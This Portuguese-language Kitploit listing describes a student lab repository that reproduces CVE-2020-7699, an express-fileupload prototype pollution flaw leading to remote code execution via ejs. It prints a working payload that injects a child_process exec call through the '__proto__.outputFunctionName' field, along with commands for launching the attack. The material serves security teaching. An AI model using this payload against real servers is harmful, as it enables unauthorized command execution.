Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-7699_reproduce — Reprodução do CVE-2020-7699, trabalho final da disciplina de Princípios de Segurança de Software. | Kitploit
Ferramentas/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

Reprodução do CVE-2020-7699, trabalho final da disciplina de Princípios de Segurança de Software.

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Reprodução do CVE-2020-7699

Reprodução da vulnerabilidade de RCE do Node.js (CVE-2020-7699), meu trabalho de laboratório

Configuração

Versão do Node.js: v14.16.1, por favor certifique-se de que a versão do Node.js seja 14 (outras versões provavelmente funcionarão, não testei)

Versão do Python: 3.9.5, o Python é usado apenas para enviar a requisição de ataque HTTP, nenhuma versão específica é necessária

Basta usar clone no repositório, npm i para instalar as dependências. Também forneci mais 2 comandos:

  • usando npm run start-server para iniciar o servidor alvo (servidor vítima)
  • usando npm run launch-attack para lançar o ataque

Análise

express-fileUpload: versões abaixo de 1.1.10 serão afetadas

No express-fileUpload existe poluição de protótipo

Vulnerabilidade: poluição de protótipo no express-fileUpload

Como usar: poluir __proto__.outputFunctionName para escrever o comando a ser executado. Ex.: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

No ejs existe RCE

Vulnerabilidade: o ejs tentará executar xxx.outputFunctionName, que é undefined, mas se object.outputFunctionName for poluído, ele o executará em vez disso

Baixar ferramenta